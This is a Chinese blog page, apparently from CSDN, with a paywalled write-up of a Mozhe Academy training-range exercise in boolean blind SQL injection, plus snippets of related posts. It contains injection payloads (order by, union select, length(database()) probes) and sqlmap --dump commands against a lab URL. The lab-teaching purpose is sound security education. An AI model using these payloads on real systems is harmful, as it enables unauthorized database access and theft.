[墨者学院]SQL注入漏洞测试(布尔盲注)

已于 2022-03-24 17:25:03 修改
阅读量4.2k 收藏 1
点赞数 1
文章标签: 安全
于 2022-03-22 00:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60945802/article/details/123636747
版权
本文详细介绍了如何进行布尔盲注测试,包括判断注入点、确定字段数量、猜测数据库名、表名和字段名,以及利用sqlmap工具进行自动化测试。通过一系列步骤,揭示了SQL注入攻击的过程,并强调了数据库安全的重要性。
摘要由CSDN通过智能技术生成 

length() 函数 返回字符串的长度 
ascii() 返回字符的ascii码   [将字符变为数字wei] 
substr() 截取字符串 (语法:SUBSTR(str,pos,len);)

布尔盲注

1.判断注入点

and -1=-1  页面返回有数据

and -1=-2  页面无结果返回          存在SQL注入

2. 判断当前页面字段总数

and -1=-1 order by 4 页面返回有数据

and -1=-2 order by 5页面无结果返回           

 当前页面字段数为:4

3.判断显示位

and -1=-2 union select 1,2,3  页面无结果返回

and -1=-2 union select 1,2,3,4 页面正常返回

无回显点,应该是:盲注并且是布尔盲注(有明显的True和Flash)。

4.猜解当前数据库名称长度

and (length(database()))>9页面返回有数据

and (length(database()))>10页面无结

最低0.47元/天 解锁文章
coco.koko
关注
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 477
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院-SQL注入漏洞测试布尔盲注
qq_47094508的博客
01-23 3162
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
墨者学院-SQL注入漏洞测试(布尔盲注)
Fisher
12-01 3969
拿到题目之后打开网站发现如下界面 本以为是输入框存在注入,结果发现并不是,而是下面一段小字,发现存在id=1的字样 手工注入: 1.判断注入点:
SQL注入漏洞测试(布尔盲注)
cpzzy123的博客
08-14 1357
一.SQL盲注的定义 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔盲注。 二.直接上实战 就拿这个网站的后台管理系统为例,我们先用御剑目录扫描网站目录,居然发现他登陆按钮底下的提示文字目录很有意思,去访问一下: 很容易看出来,这个停机维护的文字肯定...
墨者SQL注入漏洞测试(布尔盲注)
weixin_48621644的博客
09-15 993
小羊学安全 任重而道远~
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 834
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院SQL注入漏洞测试(布尔盲注)
没事我溜达
03-18 2144
靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 打开靶场 我们先判断注入点,通过and 1 = 1和and 1 = 2来判断 发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。 构造语句来证明我的想法 and length(database())= 10 发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlma...
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 460
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
墨者学院-----SQL注入漏洞测试(布尔盲注)
qq_43590351的博客
05-21 610
SQL注入漏洞测试(布尔盲注) 第一步判断注入点: 在url中输入单引号发现报错,再输入and1=1页面正常,and1=2报错 说明此url存在着SQL注入漏洞 http://219.153.49.228:48551/new_list.php?id=1 and 1=2 第二步判断字段数 利用order by 语句,值为4页面正常,5报错,说明有四个字段 http://219.153.49.228:48551/new_list.php?id=1 order by 4 第三步:猜解数据库的长度以及数据库名称
刷题笔记:SQL注入漏洞测试(布尔盲注)
m0_67399862的博客
05-18 177
由and语句可看到两句都为真时页面正常,一真一假时,页面报错 用order by语句查字段数 发现4的时候,页面正常,当5的时候,页面报错 所以字段数为4 用union select语句进行联合查询时,发现1,2,3,4语句并没有拼接上去 在1前面加了个-号,仍然没有信息回显,又想到前面SQL语句执行成功和错误会返回两个不同的页面,所以考虑布尔盲注。 用and length(database())>=num语句来判断数据库长度,发现数据库的长度为10 ...
0x00.SQL注入漏洞测试(布尔盲注)
qq_31679787的博客
09-09 213
初始界面; 尝试进行post注入,但是发现不行; 但是发现下方的通知栏会跳转,跳转后的页面存在注入; 爆库名; 爆表名; 先爆member表的列名; 爆库; 通过md5解密得到密码; 登录后得到key; ...
墨者学院SQL注入漏洞测试(布尔盲注)
痴人说梦梦中人
11-13 474
1、 使用SQLmap,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key 2、 爆库 爆表 爆列 Dump Md5解密: 登陆获取key 3.修复建议 对sql语句进行以下处理: 1、 sql语句预编译 2、 检查变量数据类型和格式 3、 过滤特殊字符 4、 转译特殊符号 ...
墨者学院sql注入布尔
最新发布
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值